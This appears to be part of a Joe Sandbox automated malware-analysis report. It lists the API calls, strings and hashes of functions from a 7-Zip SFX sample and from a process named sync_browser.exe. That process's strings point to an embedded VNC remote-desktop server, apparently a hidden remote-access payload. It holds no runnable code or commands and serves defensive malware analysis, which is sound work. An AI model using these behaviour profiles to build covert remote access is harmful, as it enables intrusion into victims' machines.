Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5

Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C

Strings

(nA, xrefs: 00411F5C
{D@, xrefs: 00411FD8, 00411FEF, 00412002, 00412187, 00412197, 00412276

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: (nA${D@
API String ID: 613200358-2741945119
Opcode ID: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
Opcode Fuzzy Hash: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48

Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574

??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36

Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E

Strings

{D@, xrefs: 00411C15, 00411C44, 00411C56

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: {D@
API String ID: 4294387087-1160549682
Opcode ID: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
Opcode Fuzzy Hash: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94

Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00404310

Strings

GUIFlags, xrefs: 004042EF
^L@, xrefs: 004042EB, 0040430F

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$^L@
API String ID: 2131799477-2609156739
Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D

Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407EEF
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00407F17

Strings

(%d%s), xrefs: 00407EE9

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@wsprintf
String ID: (%d%s)
API String ID: 3815514257-2087557067
Opcode ID: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
Opcode Fuzzy Hash: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98

Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(?), ref: 004030FB
GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

Strings

t1@, xrefs: 00403114

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: TextWindow$Length
String ID: t1@
API String ID: 1006428111-473456572
Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90

Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472

Strings

7-Zip SFX, xrefs: 00404466
Could not allocate memory, xrefs: 0040446B

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

Analysis Process: sync_browser.exePID: 7788, Parent PID: 424COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.3%
Total number of Nodes:	1041
Total number of Limit Nodes:	50

Executed Functions

Function 00007FF7D59536D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895
librarythreadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00007FF7D595371A
GetCurrentThreadId.KERNEL32 ref: 00007FF7D5953764
GetThreadDesktop.USER32 ref: 00007FF7D595376C
_snprintf.LIBCMT ref: 00007FF7D5953820
free.LIBCMT ref: 00007FF7D5953862
free.LIBCMT ref: 00007FF7D595386F
SleepEx.KERNELBASE ref: 00007FF7D59538D5
timeGetTime.WINMM ref: 00007FF7D5953A99
EnterCriticalSection.KERNEL32 ref: 00007FF7D5953ADF
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5953B11
GetComputerNameA.KERNEL32 ref: 00007FF7D5953BDC
gethostname.WS2_32 ref: 00007FF7D5953C8D
EnterCriticalSection.KERNEL32 ref: 00007FF7D5953F3D
CreateRectRgn.GDI32 ref: 00007FF7D5953F70
DeleteObject.GDI32 ref: 00007FF7D5953F9B
free.LIBCMT ref: 00007FF7D5953FA5
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5953FAE

Part of subcall function 00007FF7D59C7D90: EnterCriticalSection.KERNEL32(?,?,?,00007FF7D5953FBC), ref: 00007FF7D59C7DA1
Part of subcall function 00007FF7D59C7D90: SetThreadPriority.KERNEL32(?,?,?,00007FF7D5953FBC), ref: 00007FF7D59C7DD5
Part of subcall function 00007FF7D59C7D90: GetLastError.KERNEL32(?,?,?,00007FF7D5953FBC), ref: 00007FF7D59C7DDF

GetTickCount.KERNEL32 ref: 00007FF7D59541B3

Part of subcall function 00007FF7D599A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF7D599A5E1
Part of subcall function 00007FF7D599A5B0: GetThreadDesktop.USER32 ref: 00007FF7D599A5E9
Part of subcall function 00007FF7D599A5B0: OpenInputDesktop.USER32 ref: 00007FF7D599A5FC

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
CloseDesktop.USER32 ref: 00007FF7D5957C4A
Sleep.KERNEL32 ref: 00007FF7D5957C8F
FlushFileBuffers.KERNEL32 ref: 00007FF7D5957CBC
CloseHandle.KERNEL32 ref: 00007FF7D5957CE6
FlushFileBuffers.KERNEL32 ref: 00007FF7D5957D1E
CloseHandle.KERNEL32 ref: 00007FF7D5957D48
CloseDesktop.USER32 ref: 00007FF7D5957D9D
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5957E0B
LoadLibraryA.KERNEL32 ref: 00007FF7D5957E5D

Part of subcall function 00007FF7D599A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF7D599A3E3
Part of subcall function 00007FF7D599A3B0: GetThreadDesktop.USER32 ref: 00007FF7D599A3EB
Part of subcall function 00007FF7D599A3B0: GetUserObjectInformationA.USER32 ref: 00007FF7D599A411

GetProcAddress.KERNEL32 ref: 00007FF7D5957E75
FreeLibrary.KERNEL32 ref: 00007FF7D5957E97

Strings

service mode, xrefs: 00007FF7D5953D82
Host name unavailable, xrefs: 00007FF7D5953CA1
( , xrefs: 00007FF7D5953CF4
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncclient.cpp : PostAddNewClient II, xrefs: 00007FF7D5957F29
vncclient.cpp : failed to close desktop, xrefs: 00007FF7D5957DA7
application mode, xrefs: 00007FF7D5953DA2
\logging.dll, xrefs: 00007FF7D5957E38
vncclient.cpp : sent pixel format to client, xrefs: 00007FF7D5953EF5
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF7D5957C66
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF7D5957C54
vncservice.cpp : PostAddNewClient failed, xrefs: 00007FF7D59539CA
vncclient.cpp : authenticated connection, xrefs: 00007FF7D5953A76
vncclient.cpp : PostAddNewClient I, xrefs: 00007FF7D5953932
Could not connect using %s!, xrefs: 00007FF7D59537F5
LOGEXIT, xrefs: 00007FF7D5957E6B
- , xrefs: 00007FF7D5953D62
Could not connect to %s!, xrefs: 00007FF7D595380D
vncclient.cpp : client connected : %s (%hd), xrefs: 00007FF7D595374A
vncclient.cpp : negotiated version, xrefs: 00007FF7D59539F9
vncclient.cpp : client disconnected : %s (%hd), xrefs: 00007FF7D5957DE6
WinVNC, xrefs: 00007FF7D5953C5C
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 459429253-3399855497
Opcode ID: 8432e4efc740345091377005b2eacb5c278ac1678e2a0acd21ca72edf8fc683e
Instruction ID: 7ba62b16500b7bc84e62c6bd115fc8d745b46febf34b995eb903bfbc91847b0d
Opcode Fuzzy Hash: 8432e4efc740345091377005b2eacb5c278ac1678e2a0acd21ca72edf8fc683e
Instruction Fuzzy Hash: 55A29D22608A9186E754EF25C848BFEABA1FB84F98FC44232DE1D477A5CF38D555C720

Function 00007FF7D5999BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5999C03
GetProcAddress.KERNEL32 ref: 00007FF7D5999C1B
GetProcAddress.KERNEL32 ref: 00007FF7D5999C2E
GetSystemMetrics.USER32 ref: 00007FF7D5999C4E
GetCurrentProcessId.KERNEL32 ref: 00007FF7D5999C61
ProcessIdToSessionId.KERNEL32 ref: 00007FF7D5999C76
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7D5999C85
Process32First.KERNEL32 ref: 00007FF7D5999CA4
CloseHandle.KERNEL32 ref: 00007FF7D5999CB1
FreeLibrary.KERNEL32 ref: 00007FF7D5999CBF

Strings

explorer.exe, xrefs: 00007FF7D5999CD0
ProcessIdToSessionId, xrefs: 00007FF7D5999C21
kernel32.dll, xrefs: 00007FF7D5999BF2
WTSGetActiveConsoleSessionId, xrefs: 00007FF7D5999C11

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
API String ID: 1881659197-3751679782
Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction ID: 8193e1a37fd29b82ec6c60b1d60092f998a6bb55c3d4398f5935bd2b67d8e39a
Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction Fuzzy Hash: 8C416E32A187568BEB14AB25A80457DA7A4FF88F94FC41136ED5E17798EF3CE404CB60

Function 00007FF7D5999EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessWindowStation.USER32 ref: 00007FF7D5999F30
GetUserObjectInformationA.USER32 ref: 00007FF7D5999F5E
GetLastError.KERNEL32 ref: 00007FF7D5999F64
SetLastError.KERNEL32 ref: 00007FF7D5999F6C
RevertToSelf.ADVAPI32 ref: 00007FF7D5999F79
GetUserNameA.ADVAPI32 ref: 00007FF7D599A008
GetLastError.KERNEL32 ref: 00007FF7D599A012
GetLastError.KERNEL32 ref: 00007FF7D599A044

Strings

vncservice.cpp : getusername error %d, xrefs: 00007FF7D599A04A
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF7D599A094
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF7D599A06F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF7D599A01F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF7D5999F3B
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF7D5999FB7
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF7D5999F7F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
API String ID: 3635673080-2232443292
Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction ID: 1728cf2b9f1580ccd783158118235c8f17362c3b95db6e05a80736063fe73014
Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction Fuzzy Hash: 1B414965A0C56287EB04AB29F8406BDEBA1BFC4B48FC45033DE0D86569DF3DE545C760

Function 00007FF7D5939D00 Relevance: 15.2, APIs: 10, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF7D5939DBB
EnumServicesStatusA.ADVAPI32 ref: 00007FF7D5939E1D
GetLastError.KERNEL32 ref: 00007FF7D5939E2B
EnumServicesStatusA.ADVAPI32 ref: 00007FF7D5939E85
OpenServiceA.ADVAPI32 ref: 00007FF7D5939EB9
QueryServiceConfigA.ADVAPI32 ref: 00007FF7D5939ED7
GetLastError.KERNEL32 ref: 00007FF7D5939EE5
QueryServiceConfigA.ADVAPI32 ref: 00007FF7D5939F16
CloseServiceHandle.ADVAPI32 ref: 00007FF7D5939FCA
CloseServiceHandle.ADVAPI32 ref: 00007FF7D5939FF0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
String ID:
API String ID: 3151975580-0
Opcode ID: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
Instruction ID: e5917003103fcf0905bd54af56d89abf61bc6610dda603cc7083c1cd9a2e5741
Opcode Fuzzy Hash: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
Instruction Fuzzy Hash: A5916222B19A418AFB14EBB5D4147ADB7B1AF48BACFC04636EE1D17A98DF38D505C310

Function 00007FF7D5958590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165
windowsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00007FF7D59585FB
WaitForSingleObject.KERNEL32 ref: 00007FF7D5958608
free.LIBCMT ref: 00007FF7D5958651
SendMessageA.USER32 ref: 00007FF7D5958751
free.LIBCMT ref: 00007FF7D5958763
free.LIBCMT ref: 00007FF7D5958774
FreeLibrary.KERNEL32 ref: 00007FF7D59587B5
DeleteObject.GDI32 ref: 00007FF7D595880A
free.LIBCMT ref: 00007FF7D5958817
DeleteObject.GDI32 ref: 00007FF7D5958832
free.LIBCMT ref: 00007FF7D595883F
DeleteObject.GDI32 ref: 00007FF7D595884B
free.LIBCMT ref: 00007FF7D5958858
DeleteObject.GDI32 ref: 00007FF7D5958864
free.LIBCMT ref: 00007FF7D5958871

Strings

vncclient.cpp : deleting socket, xrefs: 00007FF7D5958666
vncclient.cpp : ~vncClient() executing..., xrefs: 00007FF7D59585BA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

